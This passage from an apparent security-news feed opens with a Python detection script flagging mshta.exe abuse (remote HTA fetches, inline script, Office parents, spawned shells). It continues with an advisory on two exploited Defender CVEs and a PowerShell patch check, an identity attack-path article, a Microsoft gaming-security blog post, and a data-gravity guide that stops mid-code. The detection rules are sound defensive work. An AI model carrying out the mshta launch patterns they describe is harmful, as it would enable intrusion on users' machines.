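    """Return the names of every rule that fires for one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "mshta.exe":
        if REMOTE_URI.search(cmd):
            hits.append("mshta_remote_uri")        # HTA fetched over the network
        if INLINE_SCRIPT.search(cmd):
            hits.append("mshta_inline_script")     # script passed on the command line
        if parent in OFFICE_APPS:
            hits.append("mshta_office_parent")     # document-borne launch
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("mshta_spawns_shell")          # second stage handed to a shell/script host
    return hits


def detect_mshta(events):
    """Return [(event_index, rule_name), ...] across a batch of events."""
    return [(i, rule) for i, event in enumerate(events) for rule in classify(event)]


if __name__ == "__main__":
    for index, rule in detect_mshta(SAMPLE_EVENTS):
        print(f"event {index}: {rule}: {SAMPLE_EVENTS[index]['CommandLine']}")
```

The benign first event shows why a bare "mshta.exe ran" alert is too noisy to page on: some vendor software still ships HTA help files. Matching on the parent, the argument shape, and what mshta.exe spawns next gives rules that survive a week of real telemetry, and the same four signals translate directly to EDR query languages or Sigma.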

That's the problem with weeks like this. Nothing feels shocking for more than five minutes, because the next thing is already waiting. A fake app here, a bad package there, a cloud trick in the middle. Same fire, new room.

Patch what matters. Watch what you trust. And do not ignore the boring alerts just because they look familiar. That is usually where the story starts.



from The Hacker News https://ift.tt/tRN0wzf
via IFTTT

Microsoft Warns of Two Actively Exploited Defender Vulnerabilities

Microsoft has disclosed that a privilege escalation flaw and a denial-of-service flaw in Defender have come under active exploitation in the wild.

The former, tracked as CVE-2026-41091, is rated 7.8 on the CVSS scoring system. Successful exploitation of the flaw could allow an attacker to gain SYSTEM privileges.

"Improper link resolution before file access ('link following') in Microsoft Defender allows an authorized attacker to elevate privileges locally," Microsoft said in an advisory.

The second vulnerability under exploitation is CVE-2026-45498 (CVSS score: 4.0), a denial-of-service bug impacting Defender. The two vulnerabilities have been addressed in Microsoft Defender Antimalware Platform versions 1.1.26040.8 and 4.18.26040.7, respectively.

The tech giant noted that systems on which Microsoft Defender is disabled are not susceptible to the vulnerabilities, adding that no action is required to install the update because Microsoft Defender automatically updates malware definitions and the Microsoft Malware Protection Engine for optimal protection.

Microsoft credited five different parties with discovering and reporting the flaw, including Sibusiso, Diffract, Andrew C. Dorman (aka ACD421), Damir Moldovanov, and an anonymous researcher.

To confirm that the latest version of the Microsoft Malware Protection Platform and the current definition updates are being downloaded and installed, users are advised to follow the steps below:

  • Open the Windows Security program.
  • In the navigation pane, select Virus & threat protection.
  • Then click on Protection updates in the Virus & threat protection updates section.
  • Select Check for updates.
  • In the navigation pane, select Settings, and then select About.
  • Examine the Antimalware ClientVersion number.
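The same check scripted for fleet use, as an added example that is not from the article or Microsoft: it relies on the built-in Defender cmdlets Get-MpComputerStatus and Update-MpSignature, and the mapping of the two fixed versions to the platform (AMProductVersion) and engine (AMEngineVersion) fields is an assumption.

```powershell
# Added example; not from the article or Microsoft. Uses the built-in Defender
# cmdlets Get-MpComputerStatus and Update-MpSignature. Assumed field mapping for
# the two fixed versions named above:
#   4.18.26040.7 -> AMProductVersion (antimalware platform)
#   1.1.26040.8  -> AMEngineVersion  (malware protection engine)
$MinPlatform = [version]'4.18.26040.7'
$MinEngine   = [version]'1.1.26040.8'

function Test-DefenderPatchLevel {
    param(
        [Parameter(Mandatory)][version]$MinPlatform,
        [Parameter(Mandatory)][version]$MinEngine
    )
    $s = Get-MpComputerStatus
    if (-not $s.AMServiceEnabled) {
        # Microsoft notes that systems with Defender disabled are not affected.
        return [pscustomobject]@{ Status = 'DefenderDisabled'; Platform = $null; Engine = $null; Signatures = $null }
    }
    # [version] comparison handles multi-part numbers correctly (4.18.9 < 4.18.10).
    $platformOk = ([version]$s.AMProductVersion) -ge $MinPlatform
    $engineOk   = ([version]$s.AMEngineVersion)  -ge $MinEngine
    $status = if ($platformOk -and $engineOk) { 'Patched' } else { 'NeedsUpdate' }
    [pscustomobject]@{
        Status              = $status
        Platform            = $s.AMProductVersion
        Engine              = $s.AMEngineVersion
        Signatures          = $s.AntivirusSignatureVersion
        LastSignatureUpdate = $s.AntivirusSignatureLastUpdated
    }
}

$before = Test-DefenderPatchLevel -MinPlatform $MinPlatform -MinEngine $MinEngine
$before
if ($before.Status -eq 'NeedsUpdate') {
    # Same effect as "Check for updates" in the GUI: request the latest definitions,
    # the channel Microsoft says also carries the engine update, then re-check.
    Update-MpSignature
    Test-DefenderPatchLevel -MinPlatform $MinPlatform -MinEngine $MinEngine
}
```

Run it in an elevated PowerShell session; a Status of NeedsUpdate after Update-MpSignature means the platform update has not yet been delivered to that host.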

There are currently no details on how the vulnerabilities are being exploited in the wild. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added both of them to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by June 3, 2026.

Last week, Microsoft also disclosed that a cross-site scripting flaw impacting on-premise versions of Exchange Server (CVE-2026-42897, CVSS score: 8.1) has been weaponized in real-world attacks.

Also added to the KEV catalog on Wednesday are four other Microsoft flaws from 2008, 2009, and 2010 -

  • CVE-2010-0806 - Microsoft Internet Explorer contains a use-after-free vulnerability that could allow remote attackers to execute arbitrary code.
  • CVE-2010-0249 - Microsoft Internet Explorer contains a use-after-free vulnerability that could allow remote attackers to execute arbitrary code.
  • CVE-2009-1537 - Microsoft DirectX contains a NULL byte overwrite vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow, which could allow remote attackers to execute arbitrary code via a crafted QuickTime media file.
  • CVE-2008-4250 - Microsoft Windows contains a buffer overflow vulnerability in the Windows Server Service that allows remote attackers to execute arbitrary code via a crafted RPC request.

Another vulnerability that finds a mention in the list is CVE-2009-3459, a heap-based buffer overflow vulnerability in Adobe Acrobat and Reader that could allow remote attackers to execute arbitrary code via a crafted PDF file that triggers memory corruption.



from The Hacker News https://ift.tt/d5CsWJl
via IFTTT

When Identity is the Attack Path

Consider a cached access key on a single Windows machine. It got there the way most cached credentials do - a user logged in, and the key stored itself automatically. Standard AWS behavior. No one misconfigured anything or violated a policy. Yet that single key, which was easily accessible to a minor-league attacker, could have opened a path to some 98% of entities in the company's cloud environment - nearly every critical workload the business depended on. 

This real-world exposure was caught before an attacker could use it. But the takeaway is clear: identity itself, and every permission it carries, has become the attack path.

Your environment runs on identity. Active Directory, cloud identity providers, service accounts, machine identities, and AI agents - all of these carry permissions that span systems and trust boundaries. A single stolen credential hands the attacker a legitimate identity - along with every permission attached to it. 

Despite this, most security programs still treat identity as a perimeter control - something to protect through authentication and access policies. Yet the real risk starts inside the front door. Once an attacker has a foothold, identity is what lets them advance, cross boundaries, and reach critical assets. Because identity is not a perimeter - it's a highway that runs through every layer of your environment.

In this article, we'll look at how cached credentials, excessive permissions, and forgotten role assignments can turn into attack paths across hybrid environments - and why the tools designed to catch them keep missing.

The Attack Path Runs Through Identity

The cached access key from that opening scenario is just one example of a much larger phenomenon. Across hybrid environments, identity

One Active Directory group membership that no one reviewed gives an attacker on a retail endpoint a direct path to the corporate domain. A developer SSO role provisioned for a cloud migration keeps its permissions long after the project wraps, giving anyone who compromises that identity a four-step route from developer access to production admin. What makes these real-world examples so dangerous is how they connect. That cached credential on the retail endpoint led to an overprivileged role in Active Directory, which led to a cloud workload with an attached admin policy. Together, the links in this type of identity exposure chain form a single attack path - from an initial foothold to a critical asset. 

How prevalent is this? Palo Alto found that identity weaknesses played a serious role in nearly 90% of its 2025 incident response investigations. And given the prevalence of AI agents taking on enterprise workloads, those numbers are likely to go up. SpyCloud's 2026 Identity Exposure Report flagged non-human identity theft as one of the fastest-growing categories in the criminal underground, with a third of recovered non-human credentials tied to AI tools. 

What happens when one of those non-human identities carries admin-level permissions? Consider a dev team that configures an MCP server with high-level permissions so their AI tooling can operate across systems. The AI agent using the MCP server inherits those privileges as its own identity. A vulnerability in the open-source tooling can easily hand an attacker the permissions that agent holds. From there, the path runs straight into cloud resources, databases, and production infrastructure. The credentials that make this possible are exactly the kind found circulating in criminal marketplaces by the millions.

Clearly, the threat of identity exposures is not a new one. Yet the identity tools most organizations still rely on were built to solve specific problems in isolation – and in a different threat era. 

IGA platforms manage user lifecycle - provisioning, deprovisioning, access reviews, and more. PAM solutions store privileged credentials and monitor sessions. Each of these tools does its job in isolation. But none of them can map how identity exposures chain together across endpoints, Active Directory, and cloud environments into a single exploitable route.

This is why the rates of identity-based incidents keep climbing even as security spending grows. The IBM X-Force 2026 Threat Intelligence Index found that stolen or misused credentials accounted for 32% of incidents - the second most common initial access vector. Today’s attackers really don’t need to write malware or exploits; they can just log in.

The vast majority of these identity-based exposures are entirely preventable. In fact, Palo Alto found that over 90% of the breaches its teams investigated in 2025 were enabled by exposures that existing tools should have caught. The organizations had the tools and the staff. Yet the gaps persisted because no single tool had visibility into how identity exposures chained together across environments into attack paths. 

Closing the Gap

Until security programs can connect identity, permissions, and access controls into a unified view of how an attacker actually moves, identity will remain one of the easiest ways to compromise critical assets. 

Every scenario in this article follows the same structure: a credential, permission, or role assignment that no single tool flags as dangerous creates a traversable path from a low-level foothold to a critical asset. The path only becomes visible when identity, access policies, and environment context are mapped together.
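To make that chaining concrete, here is an added example that is not from the article or any XM Cyber product: a constructed exposure map whose edges are the relationships described above (a cached key on a host, an unreviewed group membership, a stale SSO role, an attached admin policy), and a breadth-first search that reports whether a low-level foothold reaches a critical asset and through which links. All node names are made up.

```powershell
# Added example; not from the article or XM Cyber. Nodes are hosts, identities,
# groups, roles and assets; each edge is one relationship an attacker could
# traverse. Every name below is constructed for illustration.
$Edges = @(
    [pscustomobject]@{ From = 'host:retail-endpoint-01'; To = 'user:jdoe';             Via = 'cached access key on host' }
    [pscustomobject]@{ From = 'user:jdoe';               To = 'group:Helpdesk-Ops';    Via = 'AD group membership nobody reviewed' }
    [pscustomobject]@{ From = 'group:Helpdesk-Ops';      To = 'role:DevSSO-Migration'; Via = 'SSO role kept after the migration project' }
    [pscustomobject]@{ From = 'role:DevSSO-Migration';   To = 'cloud:prod-workload';   Via = 'attached admin policy' }
    [pscustomobject]@{ From = 'user:asmith';             To = 'group:Marketing';       Via = 'AD group membership' }
    [pscustomobject]@{ From = 'group:Marketing';         To = 'share:campaign-assets'; Via = 'file share ACL' }
)
$CriticalAssets = @('cloud:prod-workload')

function Find-ExposurePath {
    param(
        [Parameter(Mandatory)][string]$Foothold,
        [Parameter(Mandatory)][string[]]$Critical,
        [Parameter(Mandatory)][object[]]$Edges
    )
    # Adjacency list keyed by source node.
    $adj = @{}
    foreach ($e in $Edges) {
        if (-not $adj.ContainsKey($e.From)) { $adj[$e.From] = [System.Collections.Generic.List[object]]::new() }
        $adj[$e.From].Add($e)
    }
    # Breadth-first search: the first critical asset reached is the fewest hops away.
    $parent = @{}                      # node -> edge used to reach it
    $seen   = @{}
    $seen[$Foothold] = $true
    $queue  = [System.Collections.Generic.Queue[string]]::new()
    $queue.Enqueue($Foothold)
    while ($queue.Count -gt 0) {
        $node = $queue.Dequeue()
        if ($Critical -contains $node) {
            # Walk the parent links back to the foothold to rebuild the chain.
            $path = [System.Collections.Generic.List[object]]::new()
            $cur = $node
            while ($parent.ContainsKey($cur)) {
                $path.Insert(0, $parent[$cur])
                $cur = $parent[$cur].From
            }
            return ,$path.ToArray()
        }
        if (-not $adj.ContainsKey($node)) { continue }
        foreach ($e in $adj[$node]) {
            if (-not $seen.ContainsKey($e.To)) {
                $seen[$e.To]   = $true
                $parent[$e.To] = $e
                $queue.Enqueue($e.To)
            }
        }
    }
    return ,@()                        # no route to any critical asset
}

foreach ($foothold in 'host:retail-endpoint-01', 'user:asmith') {
    $path = Find-ExposurePath -Foothold $foothold -Critical $CriticalAssets -Edges $Edges
    if ($path.Count -eq 0) {
        "$foothold : no path to a critical asset"
        continue
    }
    "$foothold reaches a critical asset in $($path.Count) hops:"
    for ($i = 0; $i -lt $path.Count; $i++) {
        $hop = $path[$i]
        "  {0}. {1} -> {2}  [{3}]" -f ($i + 1), $hop.From, $hop.To, $hop.Via
    }
}
```

None of the four edges on the retail path is alarming in isolation, which is the article's point; the search only flags it once the endpoint, directory and cloud relationships sit in the same map.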

Security programs that map those connections across hybrid environments can close identity-based attack paths before an attacker chains them. Programs that keep treating identity as a perimeter problem will continue losing ground to attackers who already know it's a highway.

Note: This article was thoughtfully written and contributed for our audience by Alex Gardner, Director of Product Marketing at XM Cyber




from The Hacker News https://ift.tt/l5z1g7x
via IFTTT

Wednesday, May 20, 2026

Securing the gaming culture of cultures

The Deputy CISO blog series is where Microsoft Deputy Chief Information Security Officers (CISOs) share their thoughts on what is most important in their respective domains. In this series, you will get practical advice, tactics to start (and stop) deploying, forward-looking commentary on where the industry is going, and more. In this article, Aaron Zollman, Vice President and Deputy CISO for Gaming at Microsoft discusses the unique challenges and rewards of securing gaming.

There are more than 500 million monthly active players¹ across Xbox consoles, PC, handheld, and more through Xbox cloud gaming. They’re the folks who come to mind when people refer to “gaming culture.” But they’re not really the whole story. Globally, more than 3 billion people engage with gaming.² The majority of these people are gamers, but the number also includes developers working for independent gaming studios, engineers supporting the Xbox platform, and the security and operations professionals that support them all.

In my role as Deputy CISO for Gaming at Microsoft, it’s this much larger, much more complex community that I have to take into account. My team and I aren’t tasked solely with protecting consoles or player accounts. We’re safeguarding intellectual property (IP), live operations, and the trust of billions of interactions. We’re also partnering on risks that range from cheating and monetization exploits to supply chain vulnerabilities and regulatory compliance for child safety and privacy.

Gaming isn’t really a single culture, but rather a culture of cultures—each with their own risk factors to account for. At the heart of gaming is the player experience—their need for seamless access, low latency, and frictionless, immersive experiences. This goes hand-in-hand with privacy and safety in a world where cyberattackers could target well-known players. But aside from those basic needs, players form their own tribes, and a diverse, global player base requires a different approach—which makes securing gaming unique. You don’t approach it like you might traditional enterprise. Studios operate with creative autonomy, platforms demand global scale and low latency, and players expect frictionless experiences. That diversity makes gaming vibrant while also creating unique security challenges.

Each culture comes with its own security risks

Let’s first take a look at the risks that most often appear with each of the overlapping cultures that make up the world of gaming:

Platforms, underpinning services like Xbox Game Pass and Xbox Cloud Gaming, require centralized infrastructure with high availability. Here, security must integrate seamlessly with identity systems and Microsoft-wide standards without slowing down gameplay. But platforms face a number of distinct risks.

The complexity of platforms makes them a rich target for financially-motivated cyberattackers seeking to take over top accounts—or send targeted messages to individuals in an environment where they aren’t expecting phishing, which can threaten both ecosystem trust and commercial strategy. And because platforms serve as the connective tissue between devices, we have to pay special attention to weaknesses in integration points.

We also contend with fraud and abuse in commerce systems, where bad actors attempt to manipulate in-game economies or exploit payment flows. These persistent cyberthreats require layered defenses, real-time monitoring, and rapid responses.

Game development studios, whether they are AAA giants, indie teams, or sole developers, thrive on flexibility. Their environments are highly individualized and frequently blend proprietary tools with third-party assets and co-development with partners. My job is to make sure they can innovate securely—balancing their creative freedom with governance and compliance timelines. But this flexibility introduces risks that look very different from those experienced by centralized platforms.

On the plus side, studios’ independence creates smaller failure domains, leaving them free to make their own choices and experiment with new tools, partners and engineering practices, without putting the broader platform and peer studios at risk. But reputation, regulatory liability, and cyberattacker interest can’t be firewalled off so easily. So, we need to establish a baseline of controls and detect anomalies early, closing down blind spots—despite fragmented development environments and third-party risk from studios that rely on external contractors, middleware providers, and asset marketplaces.

And some of the cyberattacks are the same: Without tight identity governance, credential sprawl can create highly-privileged accounts that become prime targets for threat actors. Studios operate under tight deadlines and with small margins, so we need empathy for their desire to make things easier—and to avoid security checks when under milestone pressure—despite the risk those actions could cause to production.

It’s also important to note that the driving factor for many threat actors targeting studios is the incredibly high value of unreleased IP. For the same reason, social engineering and insider threats are a constant risk for studios.

Studio Central Teams provide shared IT and infrastructure support. They’re the bridge between creative teams and operational security, ensuring that artists, producers, and marketers work in environments that are both productive and resilient. But that role comes with its own set of risks, which are often hidden in the complexity of shared services.

When central teams support diverse projects, maintaining consistent security baselines across cloud resources, build servers, and collaboration tools becomes difficult. Failing to maintain security consistency can lead to configuration drift—where a single misconfigured storage bucket or firewall rule can expose critical assets. But because central teams manage shared infrastructure, they are risk-averse to changes, including some critical security patches, that could cause cascading production failures.

These central teams can be security’s best partners for implementing strong monitoring and segmentation—but also need to be governed to avoid insider risk and toxic combinations of overlapping permissions.

Collaboration over control

Security in gaming isn’t about imposing rules. It’s more about partnership. I work closely with Temi Adabambo, General Manager for Gaming Security, Microsoft, and Eric Mourinho, Chief Architect, Microsoft, to co-develop secure environments and shared tooling. Governance is a dialogue. We collaborate between platform teams, studio IT, security architects, and technical directors in game studios. That’s how we manage exception handling, cross-team dependencies, and the tension between creative speed and security rigor.

One of the advantages of the Microsoft environment is the access it grants us to a security ecosystem that scales globally. In gaming, we build upon that foundation, adapting it for the unique needs of developers, platforms, and players:

  • Identity and access management: We use Microsoft Entra ID to secure identities across Xbox Live, Game Pass, and studio environments. Shared identity systems allow frictionless sign-in for players while enforcing strong authentication for developers and partners.
  • Compliance and governance: We rely on a combination of tools and processes to manage sensitive data and meet regulatory obligations across environments like public cloud infrastructure and bespoke studio setups. This includes Microsoft Purview for data classification and compliance monitoring, Microsoft Defender for Cloud for policy enforcement and resource hardening, Entra ID for identity governance, and Microsoft Sentinel for audit and reporting. Together, these capabilities help us maintain visibility, enforce standards, and respond quickly to compliance exceptions without slowing down development.
  • Threat intelligence and detection: With Microsoft Defender for Cloud, Microsoft Sentinel, and proprietary Microsoft tooling, we gain visibility into cyberthreats across platforms and supply chains. These tools allow us to detect anomalies, respond quickly, and share intelligence across teams without slowing down creative workflows.
  • Secure development lifecycles: We embed security into game development through automated code scanning, vulnerability management, and secure build pipelines, helping studios ship faster without sacrificing safety.

These are enterprise-grade capabilities, adapted to the needs of the global gaming culture of cultures. They allow us to protect billions of interactions while enabling the creativity that defines this industry. 

Looking ahead 

Gaming will only grow more complex. But I see that as an opportunity. Security presents challenges, but in facing those challenges head-on, we are constantly refining our practices, products, and player experiences. When we design for resilience, we protect not just games but the communities that help them thrive.

For Microsoft, that means treating gaming security as an ever-evolving system—one that changes with each new iteration of technology, player expectations, and the creative heartbeat of the industry.

Security teams and their families are gamers too. Visit the Xbox Wire and our recent blog post for Safer Internet Day to learn more about how we keep players and communities safe and secure at Xbox.


To hear more from Microsoft Deputy CISOs, check out the OCISO blog series:

To stay on top of important security industry updates, explore resources specifically designed for CISOs, and learn best practices for improving your organization’s security posture, join the Microsoft CISO Digest distribution list.




¹Microsoft FY25 Fourth Quarter Earnings Conference Call  

²Microsoft to acquire Activision Blizzard to bring the joy and community of gaming to everyone, across every device 

The post Securing the gaming culture of cultures appeared first on Microsoft Security Blog.



from Microsoft Security Blog https://ift.tt/gC9EAur
via IFTTT

What is data gravity? A practical 2026 guide

Nobody plans for data gravity. We’ve watched teams discover, the hard way, that their “temporary” data lake has become the permanent center of the universe because five years of API integrations, security policies, and ad-hoc analytics pipelines all point at the same storage account. At that point the only real question is whether you move the data to the workload or the workload to the data.

Today, AI clusters and edge sprawl are pulling in one direction while sovereignty rules pull in another, and that question gets expensive fast.

What is data gravity?

Dave McCrory coined the term in 2010, and the physics metaphor still holds. As data accumulates, it becomes harder to move because live workflows depend on it. Integrations, APIs, pipelines, security controls, and dependent services form around it. Eventually the environment turns into a gravity well, and architecture decisions stop being neutral. The database, data lake, object store, or edge site you chose several years ago is now deciding where the next workload runs. You might think you’re choosing infrastructure freely, but at scale your existing data often makes that decision for you.

So data gravity is bigger than storage. It influences cloud strategy, AI adoption, backup design, disaster recovery, network planning, compliance, and vendor management. Once you see it, you can’t unsee it. I’ve always thought McCrory’s metaphor is the best one-sentence explanation of why enterprise architecture drifts the way it does.

Why 2026 is different

What changed? Scale, distribution, and the fact that enterprise data has become strategic in ways it wasn’t five years ago. AI initiatives are the most obvious accelerator. Modern AI systems need internal documents, transaction data, telemetry streams, images, logs, and historical datasets. Moving all of that into a separate AI platform is slow, expensive, or sometimes simply isn’t allowed. The result is that organizations are putting GPUs, inference servers, and RAG pipelines closer to existing datasets instead of centralizing the data elsewhere. That’s a real shift in how infrastructure gets planned. We’ve all seen the AI hype cycles, but this one actually changes where you rack the hardware.

Cloud economics add their own pressure. Most cloud providers make inbound transfers cheap or free, but cross-region replication, inter-cloud transfers, and outbound movement can become costly at scale. The challenge isn’t limited to bandwidth charges. Large migrations also require validation, orchestration, downtime planning, rollback procedures, and application reconfiguration. A 20 TB environment may still feel portable. Multi-petabyte environments usually don’t.

Edge data keeps piling up in factories, hospitals, stores, vehicles, and branch offices. Transmitting every raw event to a centralized platform is often inefficient or technically unnecessary. Organizations increasingly process data locally, keeping only summarized or filtered outputs for centralized retention.

Sovereignty rules add a legal layer on top of the physical and economic ones. Frameworks such as GDPR, the EU Data Act, and India’s Digital Personal Data Protection (DPDP) Act have turned data location into a core architectural constraint. Data residency and cross-border transfer restrictions now directly influence where infrastructure goes.

How data gravity works

Four primary forces produce data gravity: volume, latency, bandwidth, and governance. They don’t show up evenly, and most teams hit one of them well before the others.

Volume is the most visible factor. The bigger the dataset, the harder it is to copy, replicate, migrate, restore, or validate. It also tends to be the force that gets noticed last, because growth is slow until it isn’t.

Latency is usually the next one to bite. Fraud detection platforms, industrial control systems, medical imaging workflows, and AI inference pipelines all require low-latency access to operational data. Even small delays can violate response targets. I’ve seen teams hit the latency wall when they tried to run inference against a data lake three regions away, and the round-trip time alone blew their SLA.

Bandwidth is the physical wall behind that. A transfer may be technically possible, but the available throughput may not support completion within your maintenance windows or recovery objectives.

Governance introduces an entirely different class of restriction. Legal obligations or internal policies may prohibit data from leaving a region, tenant, facility, or cloud platform altogether. Unlike bandwidth or latency, governance constraints can’t be solved with more engineering.

A manufacturing environment illustrates these forces clearly. Modern production facilities can generate tens of terabytes of telemetry and machine data every day. Sending every raw event to a centralized cloud platform increases latency, consumes network capacity, and may create compliance concerns. So most architectures process data locally: filtering streams, running inference, detecting anomalies, maintaining short-term history near the source, and forwarding only summarized insights upstream. Once you start looking for these patterns, you see data gravity almost everywhere in modern infrastructure design.

When gravity helps and when it hurts

Data gravity isn’t necessarily a problem. Concentrated data makes a platform more useful at scale. When data is in one place, teams can govern it consistently. Security policies are easier to enforce, access control is more predictable, and analytics teams avoid reconciling conflicting copies of the same information across departments. AI initiatives benefit from more complete training and retrieval datasets, while backup and retention policies become easier to standardize.

The trouble starts when that same concentration gets hard to change. A multi-petabyte data lake may become too expensive to relocate. Applications depend on local latency characteristics. APIs, indexes, pipelines, reports, and backup jobs are all designed around the assumption that the data stays put. At that point, gravity constrains you. Migrations slow down. Cloud exit costs increase. Multi-cloud strategies become harder to execute, and vendor lock-in becomes a long-term operational concern. The same centralization that once improved governance can eventually reduce architectural agility.

This is usually the moment when organizations realize they are no longer simply managing infrastructure, but the consequences of years of accumulated data placement decisions. The objective becomes controlling where data gravity forms and how strongly it influences future decisions.

The egress problem

Cloud egress pricing is one of the clearest economic manifestations of data gravity. Public cloud platforms generally make inbound data transfers inexpensive, but outbound movement is treated very differently. At smaller scale, egress costs may appear negligible. At enterprise scale, they’re part of migration planning. At petabyte scale, even a few cents per gigabyte can turn a one-time transfer into a five-figure invoice before you’ve even started budgeting for engineering time, validation, downtime, and rehydration.

The provider invoice is also only part of the cost. You still need to verify data integrity, retune pipelines, redo access control, reconfigure applications, and plan a rollback path in case the migration fails. I used to ignore the egress line item until I saw it eclipse the compute bill.

None of this means cloud adoption is the wrong strategy. For many workloads, public cloud infrastructure remains the right operational and economic choice. The important point is that datasets rarely remain small indefinitely. Evaluating placement strategy, growth patterns, access behavior, and exit planning early gives you a lot more architectural flexibility later.

Data gravity at the edge

Edge environments produce smaller gravity wells distributed across the infrastructure map. A factory, hospital, retail store, or vehicle fleet generates data right next to the machines, sensors, cameras, or users it’s coming from. Shipping every raw event back to a central data center is often too slow, too expensive, or just unnecessary. As a result, edge architectures increasingly process data locally.

Inference, filtering, compression, aggregation, anomaly detection, and short-term storage all happen near the source. The central platform only gets the selected outputs: alerts, summaries, model updates, and anything that needs long-term retention. You see this pattern in manufacturing, retail video analytics, healthcare imaging, logistics, energy, and automotive. Edge data gravity is a big reason compute and storage are moving closer to where the data is created. I visited a plant last year where the edge cluster had become the de facto production environment because the WAN link couldn’t handle the camera feeds. (This is also why the smart money stopped predicting the death of on-prem storage back in 2019, but that’s an argument for another day.)

Data gravity in the AI era

AI intensifies data gravity because modern AI systems depend heavily on direct access to trusted operational data. Training, fine-tuning, retrieval, and inference workflows all become more effective when they can interact with authoritative datasets directly. The more sensitive or regulated that data becomes, the less practical it is to export into a separate AI environment.

Retrieval-augmented generation is the clearest case. A RAG system needs to reach documents, databases, file shares, ticket histories, and internal knowledge bases. Pulling all of that into a new AI platform creates security, governance, latency, and duplication issues. In a lot of setups, the cleaner answer is to bring the AI layer to the governed data sources instead.

That changes the infrastructure conversation. Instead of focusing only on where compute resources are cheapest, organizations increasingly ask where compute can access data securely, efficiently, and with acceptable latency. This shift is why GPUs, inference servers, and AI services are now being deployed alongside existing data lakes, object stores, warehouses, and edge storage platforms. We learned that lesson while trying to build a RAG prototype against a locked-down ERP database. The security team wouldn’t let us export the schema – I think their exact words were “over our dead bodies” – so we ended up colocating the inference box in the same VLAN. It was messier than the architecture diagrams suggested. Actually, the diagrams never mentioned the VLAN limit at all.

Data gravity vs data sovereignty

Data gravity and data sovereignty are closely related, but they solve different problems. Gravity itself is a physical, operational, and economic constraint. Sovereignty is a legal and regulatory one. One makes data difficult to move efficiently. The other can make moving it restricted or outright prohibited.

This distinction matters because many infrastructure teams discover too late that solving the technical side of data movement doesn’t automatically solve the compliance side.

 

| Dimension          | Data gravity                                                            | Data sovereignty                                           |
|--------------------|-------------------------------------------------------------------------|------------------------------------------------------------|
| Type of constraint | Physical and economic                                                   | Legal and regulatory                                       |
| Main cause         | Dataset size, latency, bandwidth, transfer cost                         | Jurisdictional law, sector rules, contracts                |
| What it limits     | Practical movement of data and workloads                                | Permitted location of data                                 |
| Typical response   | Hybrid architecture, edge processing, federated analytics, repatriation | Regional deployments, tenant isolation, in-country storage |
| Example            | A multi-petabyte data lake too costly to migrate                        | EU personal data governed by GDPR and the EU Data Act      |

 

In production environments, these two forces usually reinforce each other. Sovereignty requirements keep data inside a jurisdiction or national boundary. As the amount of data grows, analytics platforms, AI services, backup systems, and dependent applications naturally move closer to it. Over time, the legal boundary becomes an architectural boundary as well. I once watched a compliance officer block a migration because the target region was three miles over a border. The map said it was fine. Their contract didn’t.

How to manage data gravity

You can’t eliminate data gravity, but you can design infrastructure in ways that reduce its operational impact. What matters is starting before the dataset becomes too large or too regulated to move efficiently.

Figure 1: Data gravity forming process and mitigation


The first step is visibility. Map your critical datasets, identify which applications depend on them, and estimate how quickly they are growing. Model migration costs early, including not only transfer fees but also engineering time, validation procedures, downtime planning, backup redesign, application dependencies, and rollback requirements. A useful planning exercise is to ask yourself: if this dataset grows 10x in the next three years, would your current architecture still be practical to migrate or reorganize?

You also need to separate workloads by latency sensitivity. Not every application requires local access to data. Some workloads tolerate distance well, while others depend on near-real-time response times. Understanding that difference is critical for placement decisions.

Data tiering remains one of the most effective operational controls. Hot data should stay close to active compute resources. Warm data can move into lower-cost but still accessible storage tiers. Cold data belongs in archival platforms, provided recovery times still align with business and compliance requirements.

At the edge, local processing reduces bandwidth consumption and minimizes unnecessary upstream transfers. In hybrid architectures, you should select resources based on workload behavior, latency requirements, governance constraints, and operational economics – not simply because the organization standardized on one deployment model years ago. I start every data migration review with one question: can we still move this in three years without a board-level budget request? (I skipped that question once in 2021 and we spent eleven months – plus a board presentation – unwinding a 400-TB warehouse the client had “temporarily” parked in a deprecated region.) If the answer’s no, we need to talk about tiering or splitting the dataset now.
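The planning steps above (map the dataset, model migration cost early, split the latency-sensitive hot tier from the rest, and ask whether the data is still movable in three years) are easier to act on with a small model than with a diagram. The block below is an added example, not StarWind's code or tooling: it projects size, egress cost and transfer time over a planning horizon and reports the first year in which either the cost crosses a budget threshold or the hot tier no longer fits the cutover window. The 400-TB warehouse, the 60 % growth rate, the egress price, the link speed and the thresholds are all constructed placeholders, not real provider rates.

```python
"""Migration feasibility model for a gravity-sensitive dataset.

Added example (not StarWind's code). Every number below is a constructed
placeholder: replace egress price, link speed and thresholds with your own.
"""
from dataclasses import dataclass

TB_TO_GB = 1024
BITS_PER_TB = 1024 ** 4 * 8


@dataclass(frozen=True)
class Dataset:
    name: str
    size_tb: float
    annual_growth: float  # fractional growth per year: 0.6 means +60 % per year
    hot_fraction: float   # share that is latency-sensitive and must move inside the cutover window


@dataclass(frozen=True)
class Assumptions:
    egress_usd_per_gb: float      # placeholder transfer price, not a real provider rate
    link_gbps: float              # line rate of the migration link
    link_efficiency: float        # fraction of line rate actually achieved end to end
    cutover_window_hours: float   # how long the hot tier may be in flight
    budget_threshold_usd: float   # above this the migration needs a separate budget request


def projected_size_tb(ds: Dataset, years: int) -> float:
    """Compound the current size forward by the assumed annual growth rate."""
    return ds.size_tb * (1.0 + ds.annual_growth) ** years


def egress_cost_usd(size_tb: float, usd_per_gb: float) -> float:
    """Transfer fees alone; engineering, validation and downtime are extra."""
    return size_tb * TB_TO_GB * usd_per_gb


def transfer_hours(size_tb: float, link_gbps: float, efficiency: float = 0.7) -> float:
    """Wall-clock hours to push size_tb over the link at the achieved throughput."""
    bits_per_hour = link_gbps * 1e9 * efficiency * 3600
    return size_tb * BITS_PER_TB / bits_per_hour


def assess(ds: Dataset, a: Assumptions, years: int) -> dict:
    """Evaluate both movability tests for the dataset as it will look in `years`."""
    size = projected_size_tb(ds, years)
    cost = egress_cost_usd(size, a.egress_usd_per_gb)
    hot_hours = transfer_hours(size * ds.hot_fraction, a.link_gbps, a.link_efficiency)
    return {
        "year": years,
        "size_tb": round(size, 1),
        "egress_usd": round(cost, 2),
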